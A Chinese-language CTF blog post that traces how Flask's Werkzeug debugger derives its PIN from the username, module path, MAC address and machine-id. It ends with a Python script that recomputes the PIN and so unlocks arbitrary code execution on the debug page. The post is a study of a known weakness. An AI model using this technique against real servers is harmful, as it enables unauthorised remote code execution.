<!DOCTYPE html>













<html class="theme-next muse" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  




  <meta name="description" content="Flask 在debug模式下会生成PIN码 12345678910111213141516171819root@zo1ro-ubuntu:/var/www/html/flask# python app.py \* Serving Flask app &quot;app&quot; (lazy loading) \* Environment: production   WARNING: Do not use the">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="FLASK PIN DEBUG">
<meta property="og:url" content="https://zo1ro.github.io/2018/09/20/flask-pin/index.html">
<meta property="og:site_name" content="ZO1RO">
<meta property="og:description" content="Flask 在debug模式下会生成PIN码 12345678910111213141516171819root@zo1ro-ubuntu:/var/www/html/flask# python app.py \* Serving Flask app &quot;app&quot; (lazy loading) \* Environment: production   WARNING: Do not use the">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/1.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/2.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/3.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/4.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/5.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/6.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/7.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/8.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/9.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/10.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/11.png">
<meta property="og:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/12.png">
<meta property="og:updated_time" content="2019-06-28T04:48:36.905Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="FLASK PIN DEBUG">
<meta name="twitter:description" content="Flask 在debug模式下会生成PIN码 12345678910111213141516171819root@zo1ro-ubuntu:/var/www/html/flask# python app.py \* Serving Flask app &quot;app&quot; (lazy loading) \* Environment: production   WARNING: Do not use the">
<meta name="twitter:image" content="https://zo1ro.github.io/2018/09/20/flask-pin/1.png">



  <link rel="alternate" href="/atom.xml" title="ZO1RO" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://zo1ro.github.io/2018/09/20/flask-pin/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>FLASK PIN DEBUG | ZO1RO</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ZO1RO</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">一个向往acm的ctf_dog</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://zo1ro.github.io/2018/09/20/flask-pin/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ZO1RO">
      <meta itemprop="description" content="永远做好最坏的打算">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZO1RO">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">FLASK PIN DEBUG

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-09-20 15:30:16" itemprop="dateCreated datePublished" datetime="2018-09-20T15:30:16+08:00">2018-09-20</time>
            

            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Flask 在debug模式下会生成PIN码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">root@zo1ro-ubuntu:/var/www/html/flask# python app.py</span><br><span class="line"></span><br><span class="line"> \* Serving Flask app "app" (lazy loading)</span><br><span class="line"></span><br><span class="line"> \* Environment: production</span><br><span class="line"></span><br><span class="line">   WARNING: Do not use the development server in a production environment.</span><br><span class="line"></span><br><span class="line">   Use a production WSGI server instead.</span><br><span class="line"></span><br><span class="line"> \* Debug mode: on</span><br><span class="line"></span><br><span class="line"> \* Running on http://0.0.0.0:2333/ (Press CTRL+C to quit)</span><br><span class="line"></span><br><span class="line"> \* Restarting with stat</span><br><span class="line"></span><br><span class="line"> \* Debugger is active!</span><br><span class="line"></span><br><span class="line"> \* Debugger PIN: 251-181-066</span><br></pre></td></tr></table></figure>
 <a id="more"></a>
<p>通过PIN 码，我们可以在报错页面执行任意python代码</p>
<p><img src="1.png" alt></p>
<p>问题就出在了这个pin码的生成机制上，在同一台机子上多次启动同一个Flask应用时，会发现这个pin码是固定的。是由一些固定的值生成的，不如直接来看看Flask源码中是怎么写的</p>
<p>测试环境为：</p>
<p>· Ubuntu 16.04</p>
<p>· python 2.7</p>
<p>· Flask 0.10.1</p>
<p>主函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route("/")</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hello</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'hello world!'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"></span><br><span class="line">app.run(host=<span class="string">"0.0.0.0"</span>, port=<span class="number">2333</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>
<p>Pycharm下debug断点</p>
<p>run 函数跟进show_server_banner</p>
<p><img src="2.png" alt></p>
<p>跟进run_simple</p>
<p><img src="3.png" alt></p>
<p>跟进DebuggedApplication</p>
<p><img src="4.png" alt></p>
<p>发现pin_security ,pin_logging 两个参数</p>
<p><img src="5.png" alt></p>
<p>直接搜索pin参数发现get_pin_and_cookie_name函数</p>
<p><img src="6.png" alt></p>
<p>应该就是PIN码生成的函数</p>
<p><img src="7.png" alt></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_pin_and_cookie_name</span><span class="params">(app)</span>:</span></span><br><span class="line">    <span class="string">"""Given an application object this returns a semi-stable 9 digit pin</span></span><br><span class="line"><span class="string">    code and a random key.  The hope is that this is stable between</span></span><br><span class="line"><span class="string">    restarts to not make debugging particularly frustrating.  If the pin</span></span><br><span class="line"><span class="string">    was forcefully disabled this returns `None`.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Second item in the resulting tuple is the cookie name for remembering.</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    pin = os.environ.get(<span class="string">'WERKZEUG_DEBUG_PIN'</span>)</span><br><span class="line">    rv = <span class="literal">None</span></span><br><span class="line">    num = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Pin was explicitly disabled</span></span><br><span class="line">    <span class="keyword">if</span> pin == <span class="string">'off'</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span>, <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Pin was provided explicitly</span></span><br><span class="line">    <span class="keyword">if</span> pin <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span> <span class="keyword">and</span> pin.replace(<span class="string">'-'</span>, <span class="string">''</span>).isdigit():</span><br><span class="line">        <span class="comment"># If there are separators in the pin, return it directly</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'-'</span> <span class="keyword">in</span> pin:</span><br><span class="line">            rv = pin</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            num = pin</span><br><span class="line"></span><br><span class="line">    modname = getattr(app, <span class="string">'__module__'</span>,</span><br><span class="line">                      getattr(app.__class__, <span class="string">'__module__'</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="comment"># `getpass.getuser()` imports the `pwd` module,</span></span><br><span class="line">        <span class="comment"># which does not exist in the Google App Engine sandbox.</span></span><br><span class="line">        username = getpass.getuser()</span><br><span class="line">    <span class="keyword">except</span> ImportError:</span><br><span class="line">        username = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    mod = sys.modules.get(modname)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># This information only exists to make the cookie unique on the</span></span><br><span class="line">    <span class="comment"># computer, not as a security feature.</span></span><br><span class="line">    probably_public_bits = [</span><br><span class="line">        username,</span><br><span class="line">        modname,</span><br><span class="line">        getattr(app, <span class="string">'__name__'</span>, getattr(app.__class__, <span class="string">'__name__'</span>)),</span><br><span class="line">        getattr(mod, <span class="string">'__file__'</span>, <span class="literal">None</span>),</span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># This information is here to make it harder for an attacker to</span></span><br><span class="line">    <span class="comment"># guess the cookie name.  They are unlikely to be contained anywhere</span></span><br><span class="line">    <span class="comment"># within the unauthenticated debug page.</span></span><br><span class="line">    private_bits = [</span><br><span class="line">        str(uuid.getnode()),</span><br><span class="line">        get_machine_id(),</span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    h = hashlib.md5()</span><br><span class="line">    <span class="keyword">for</span> bit <span class="keyword">in</span> chain(probably_public_bits, private_bits):</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">if</span> isinstance(bit, text_type):</span><br><span class="line">            bit = bit.encode(<span class="string">'utf-8'</span>)</span><br><span class="line">        h.update(bit)</span><br><span class="line">    h.update(<span class="string">b'cookiesalt'</span>)</span><br><span class="line"></span><br><span class="line">    cookie_name = <span class="string">'__wzd'</span> + h.hexdigest()[:<span class="number">20</span>]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># If we need to generate a pin we salt it a bit more so that we don't</span></span><br><span class="line">    <span class="comment"># end up with the same value and generate out 9 digits</span></span><br><span class="line">    <span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        h.update(<span class="string">b'pinsalt'</span>)</span><br><span class="line">        num = (<span class="string">'%09d'</span> % int(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Format the pincode in groups of digits for easier remembering if</span></span><br><span class="line">    <span class="comment"># we don't have a result yet.</span></span><br><span class="line">    <span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">            <span class="keyword">if</span> len(num) % group_size == <span class="number">0</span>:</span><br><span class="line">                rv = <span class="string">'-'</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">'0'</span>)</span><br><span class="line">                              <span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">0</span>, len(num), group_size))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            rv = num</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rv, cookie_name</span><br></pre></td></tr></table></figure>
<p>Debug后发现return的rv变量就是生成的pin码</p>
<p><img src="8.png" alt></p>
<p>可以看到</p>
<p>username就是启动这个Flask的用户</p>
<p>modname为flask.app</p>
<p>getattr(app, ‘<strong>name</strong>‘, getattr(app.<strong>class</strong>, ‘<strong>name</strong>‘))为Flask</p>
<p>getattr(mod, ‘<strong>file</strong>‘, None)为flask目录下的一个app.py的绝对路径</p>
<p>uuid.getnode()就是当前电脑的MAC地址，str(uuid.getnode())则是mac地址的十进制表达式</p>
<p>get_machine_id()不妨跟进去看一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_machine_id</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">global</span> _machine_id</span><br><span class="line">    rv = _machine_id</span><br><span class="line">    <span class="keyword">if</span> rv <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span> rv</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_generate</span><span class="params">()</span>:</span></span><br><span class="line">        <span class="comment"># Potential sources of secret information on linux.  The machine-id</span></span><br><span class="line">        <span class="comment"># is stable across boots, the boot id is not</span></span><br><span class="line">        <span class="keyword">for</span> filename <span class="keyword">in</span> <span class="string">'/etc/machine-id'</span>, <span class="string">'/proc/sys/kernel/random/boot_id'</span>:</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="keyword">with</span> open(filename, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line">                    <span class="keyword">return</span> f.readline().strip()</span><br><span class="line">            <span class="keyword">except</span> IOError:</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># On OS X we can use the computer's serial number assuming that</span></span><br><span class="line">        <span class="comment"># ioreg exists and can spit out that information.</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="comment"># Also catch import errors: subprocess may not be available, e.g.</span></span><br><span class="line">            <span class="comment"># Google App Engine</span></span><br><span class="line">            <span class="comment"># See https://github.com/pallets/werkzeug/issues/925</span></span><br><span class="line">            <span class="keyword">from</span> subprocess <span class="keyword">import</span> Popen, PIPE</span><br><span class="line">            dump = Popen([<span class="string">'ioreg'</span>, <span class="string">'-c'</span>, <span class="string">'IOPlatformExpertDevice'</span>, <span class="string">'-d'</span>, <span class="string">'2'</span>],</span><br><span class="line">                         stdout=PIPE).communicate()[<span class="number">0</span>]</span><br><span class="line">            match = re.search(<span class="string">b'"serial-number" = &lt;([^&gt;]+)'</span>, dump)</span><br><span class="line">            <span class="keyword">if</span> match <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">                <span class="keyword">return</span> match.group(<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">except</span> (OSError, ImportError):</span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># On Windows we can use winreg to get the machine guid</span></span><br><span class="line">        wr = <span class="literal">None</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">import</span> winreg <span class="keyword">as</span> wr</span><br><span class="line">        <span class="keyword">except</span> ImportError:</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="keyword">import</span> _winreg <span class="keyword">as</span> wr</span><br><span class="line">            <span class="keyword">except</span> ImportError:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line">        <span class="keyword">if</span> wr <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="keyword">with</span> wr.OpenKey(wr.HKEY_LOCAL_MACHINE,</span><br><span class="line">                                <span class="string">'SOFTWARE\\Microsoft\\Cryptography'</span>, <span class="number">0</span>,</span><br><span class="line">                                wr.KEY_READ | wr.KEY_WOW64_64KEY) <span class="keyword">as</span> rk:</span><br><span class="line">                    machineGuid, wrType = wr.QueryValueEx(rk, <span class="string">'MachineGuid'</span>)</span><br><span class="line">                    <span class="keyword">if</span> (wrType == wr.REG_SZ):</span><br><span class="line">                        <span class="keyword">return</span> machineGuid.encode(<span class="string">'utf-8'</span>)</span><br><span class="line">                    <span class="keyword">else</span>:</span><br><span class="line">                        <span class="keyword">return</span> machineGuid</span><br><span class="line">            <span class="keyword">except</span> WindowsError:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">    _machine_id = rv = _generate()</span><br><span class="line">    <span class="keyword">return</span> rv</span><br></pre></td></tr></table></figure>
<p>首先尝试读取/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值，若有就直接返回</p>
<p>假如是在win平台下读取不到上面两个文件，就去获取注册表中SOFTWARE\Microsoft\Cryptography的值，并返回</p>
<p>这里就是etc/machine-id文件下的值</p>
<p><img src="9.png" alt></p>
<p>这样，当这6个值我们可以获取到时，就可以推算出生成的PIN码，引发任意代码执行</p>
<p>Username——》root</p>
<p>Modname——》flask.app</p>
<p>getattr(app, ‘<strong>name</strong>‘, getattr(app.<strong>class</strong>, ‘<strong>name</strong>‘))——》Flask</p>
<p>getattr(mod, ‘<strong>file</strong>‘, None)——》/usr/local/lib/python2.7/dist-packages/flask/app.pyc</p>
<p>（通过debug下发现的启动位置信息）</p>
<p>（这里有个坑，python在运行一次文件以后会将运行内存信息存储到一个pyc文件中，在下次调用程序的时候直接调用pyc文件以加快调试速度）</p>
<p><img src="10.png" alt></p>
<p>str(uuid.getnode())——》52230783609</p>
<p>（sys/class/net/eth0/address）网卡信息位置，一般为eth0，我的虚拟机下为ens33</p>
<p><img src="11.png" alt></p>
<p>get_machine_id()——》340ae5fcfaaa41f69f10045a4417e24d</p>
<p>计算出PIN</p>
<p>251-181-066</p>
<p>调试，成功进入debug</p>
<p><img src="12.png" alt></p>
<p>撒花~~</p>
<p>附源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_pin_and_cookie_name</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line">    rv = <span class="literal">None</span></span><br><span class="line">    num = <span class="literal">None</span></span><br><span class="line">    probably_public_bits = [</span><br><span class="line">       <span class="comment">#username,</span></span><br><span class="line">       <span class="comment">#modname,</span></span><br><span class="line">       <span class="comment">#getattr(app, '__name__', getattr(app.__class__, '__name__')),</span></span><br><span class="line">       <span class="comment">#getattr(mod, '__file__', None),</span></span><br><span class="line">       <span class="comment">#str(uuid.getnode()),网卡信息转10进制</span></span><br><span class="line">       <span class="comment">#get_machine_id(),注册表信息</span></span><br><span class="line">    ]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># This information is here to make it harder for an attacker to</span></span><br><span class="line">    <span class="comment"># guess the cookie name.  They are unlikely to be contained anywhere</span></span><br><span class="line">    <span class="comment"># within the unauthenticated debug page.</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    h = hashlib.md5()</span><br><span class="line">    <span class="keyword">for</span> bit <span class="keyword">in</span> probably_public_bits:</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">if</span> isinstance(bit,str):</span><br><span class="line">            bit = bit.encode(<span class="string">'utf-8'</span>)</span><br><span class="line">        h.update(bit)</span><br><span class="line">    h.update(<span class="string">b'cookiesalt'</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># If we need to generate a pin we salt it a bit more so that we don't</span></span><br><span class="line">    <span class="comment"># end up with the same value and generate out 9 digits</span></span><br><span class="line">    <span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        h.update(<span class="string">b'pinsalt'</span>)</span><br><span class="line">        num = (<span class="string">'%09d'</span> % int(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Format the pincode in groups of digits for easier remembering if</span></span><br><span class="line">    <span class="comment"># we don't have a result yet.</span></span><br><span class="line">    <span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">            <span class="keyword">if</span> len(num) % group_size == <span class="number">0</span>:</span><br><span class="line">                rv = <span class="string">'-'</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">'0'</span>)</span><br><span class="line">                              <span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">0</span>, len(num), group_size))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            rv = num</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rv</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> get_pin_and_cookie_name()</span><br></pre></td></tr></table></figure>
<p>参考链接</p>
